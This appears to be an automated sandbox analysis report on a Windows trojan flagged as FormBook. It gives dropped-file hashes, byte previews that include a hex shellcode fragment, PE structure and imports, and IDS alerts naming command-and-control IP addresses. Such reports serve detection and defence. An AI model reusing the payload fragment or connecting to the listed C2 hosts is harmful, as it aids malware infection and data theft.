                                                          Reputation:low
                                                          Preview:|nr..7DUCm..>...i.52...{4L...147ZS7DUC5147ZS7DUC5147ZS7DUC5.47Z](.[C.8...R{.t.]XG.*!X#'"X.WV4=X0u!P.FB4s^*u.zb.Z57RjXN?.47ZS7DU:48..:4.y5$..TP.I..yUV.-...x5$.+...oW#..\R\.:4.DUC5147Z.rDU.404..EjDUC5147Z.7FTH4:47NW7DUC5147Zs"DUC%147jW7DU.51$7ZS5DUE5147ZS7BUC5147ZS.@UC7147ZS7FU..14'ZS'DUC5!47JS7DUC5!47ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC514..6O0UC5E'3ZS'DUC!547JS7DUC5147ZS7DUc51T7ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5

                                                          C:\Users\user\AppData\Local\Temp\aut8EF1.tmp

                                                          Download File
                                                          Process:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):9776
                                                          Entropy (8bit):7.59515351037497
                                                          Encrypted:false
                                                          SSDEEP:192:na0ZsqLUGeKtxWQa8GfK6mXClLXcmP7m/vlhwJFNePsdxTbfVaxhY2U:azqLFLtx3a8B6OClLXZKHXwgPsdx/fK2
                                                          MD5:18789F36661D4A9BA17888CF3FD93A14
                                                          SHA1:81867564B15E71F3316482BADFCD2DBC1776DDE5
                                                          SHA-256:6A1F994B7B56C355390621990F67480089FA35182C4BC77E40D8AF400A3091AB
                                                          SHA-512:730028546FF5FF30638BB1107358D18C75D0586B08F0F4C541EE4198683B0294FAAAD374EA53C61BED06D46C062D97E8FBF1364A1519EBD83B979DE4392543C7
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:EA06..pD.L&.J...7...sz%..5.M.s...i0.L&....g9..h...g8.Q&4Z5.c3...sY..E........2^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3|v9..G.4.X.@8_..kc..i|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.

                                                          C:\Users\user\AppData\Local\Temp\brawlys

                                                          Download File
                                                          Process:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          File Type:ASCII text, with very long lines (28740), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):28740
                                                          Entropy (8bit):3.5830333524248306
                                                          Encrypted:false
                                                          SSDEEP:768:WiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbx+IT63J4vfF3if6gyzx:WiTZ+2QoioGRk6ZklputwjpjBkCiw2R5
                                                          MD5:630889F479DDF72437C461C711FE2C67
                                                          SHA1:F71D76EB70A0F2D04B73548CEF5C220BDF8C3802
                                                          SHA-256:E073A0241D58C64E343B47DBB1F06CFCF24EF5264329B3788922C3D804684DB0
                                                          SHA-512:2D7ED04990031D40BC38E868E95273ED1EAA76F4F7BC95C3FACAE8173200136E5A911E0DE07FF87F9EBEF38DD308A514EC210328469F8241325C76A08CE05185
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:606DABF73C37DFE5B6388B40F071263955F8071380D1EFA13173545CE7671ACF380x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c000000668995

                                                          C:\Users\user\AppData\Local\Temp\parters

                                                          Download File
                                                          Process:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271872
                                                          Entropy (8bit):7.991032149856088
                                                          Encrypted:true
                                                          SSDEEP:6144:rmkh9mRofd6HNNZLgZJQSH21mkz1Cr/z68w7/VLwdP1Ztp1KLAIyjui:CkhUoqeZCewz1C/z68GVMdP1ZtpEdOui
                                                          MD5:A657D61808500148FDA21BA8AB86B51B
                                                          SHA1:749897AE1DC307F71C1AB0ACB94150C862997A08
                                                          SHA-256:B546A5920AB1174E6314107B1E2F3C1FD0EFA4EBAEC6B5CB4B7DCC07F25DE5D2
                                                          SHA-512:D657BABEDF758575AB0F301DCF3BADE3B21F9BDDCC0EFD5A2D171FB92D3BB86DBFFEB058EAD17E03C5210214EF2397D32113D5BFD3EA09997CCF9E2895046A7F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:|nr..7DUCm..>...i.52...{4L...147ZS7DUC5147ZS7DUC5147ZS7DUC5.47Z](.[C.8...R{.t.]XG.*!X#'"X.WV4=X0u!P.FB4s^*u.zb.Z57RjXN?.47ZS7DU:48..:4.y5$..TP.I..yUV.-...x5$.+...oW#..\R\.:4.DUC5147Z.rDU.404..EjDUC5147Z.7FTH4:47NW7DUC5147Zs"DUC%147jW7DU.51$7ZS5DUE5147ZS7BUC5147ZS.@UC7147ZS7FU..14'ZS'DUC5!47JS7DUC5!47ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC514..6O0UC5E'3ZS'DUC!547JS7DUC5147ZS7DUc51T7ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.189069058457696
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:hkLFB22XxS.exe
                                                          File size:1'233'920 bytes
                                                          MD5:46d91dbe786e1518a8715e29f5fba781
                                                          SHA1:5da70934c50a4a626ee73bc4797cfd24e60c5a96
                                                          SHA256:04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033
                                                          SHA512:a76b633db1d81d15b9a209e8e7e1e760fc79ea451d74237b0c40abdc74ad3e7d47166e7488bccb24d025cc60dee17848e2c24256a70efd2bbb750c17acdd7d69
                                                          SSDEEP:24576:TAHnh+eWsN3skA4RV1Hom2KXMmHaRwi+mhLMGowpdTnVE6j3oYaon5:eh+ZkldoPK8YaRwivht37nVEzYa0
                                                          TLSH:FA45BE02B3D1C036FFAB92739B66F64156BD79254123852F13981DB9BC701B2237E663
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                          File Icon

                                                          Icon Hash:aaf3e3e3938382a0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x42800a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6666512A [Mon Jun 10 01:04:42 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                          Entrypoint Preview

                                                          Instruction
                                                          call 00007F95D88F457Dh
                                                          jmp 00007F95D88E7334h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F95D88E74BAh
                                                          cmp edi, eax
                                                          jc 00007F95D88E781Eh
                                                          bt dword ptr [004C41FCh], 01h
                                                          jnc 00007F95D88E74B9h
                                                          rep movsb
                                                          jmp 00007F95D88E77CCh
                                                          cmp ecx, 00000080h
                                                          jc 00007F95D88E7684h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F95D88E74C0h
                                                          bt dword ptr [004BF324h], 01h
                                                          jc 00007F95D88E7990h
                                                          bt dword ptr [004C41FCh], 00000000h
                                                          jnc 00007F95D88E765Dh
                                                          test edi, 00000003h
                                                          jne 00007F95D88E766Eh
                                                          test esi, 00000003h
                                                          jne 00007F95D88E764Dh
                                                          bt edi, 02h
                                                          jnc 00007F95D88E74BFh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F95D88E74C3h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F95D88E7515h
                                                          bt esi, 03h

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD5 build 40629
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD5 build 40629

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x62d20.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12b0000x7134.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xc80000x62d200x62e00560b2a2b198c4f91df199c777c37c217False0.9335567122313527data7.906347336305752IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x12b0000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                                          RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xd07b80x59fb8data1.000328297627575
                                                          RT_GROUP_ICON0x12a7700x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x12a7e80x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x12a7fc0x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x12a8100x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x12a8240x10cdataEnglishGreat Britain0.582089552238806
                                                          RT_MANIFEST0x12a9300x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                          07/02/24-14:03:53.795147TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973480192.168.2.638.47.158.215
                                                          07/02/24-14:04:07.263536TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973880192.168.2.63.33.130.190
                                                          07/02/24-14:02:54.728878TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971980192.168.2.665.181.132.158
                                                          07/02/24-14:04:48.099149TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975180192.168.2.6108.186.253.49
                                                          07/02/24-14:05:14.826284TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975980192.168.2.687.236.19.243
                                                          07/02/24-14:05:01.357570TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975580192.168.2.63.33.130.190
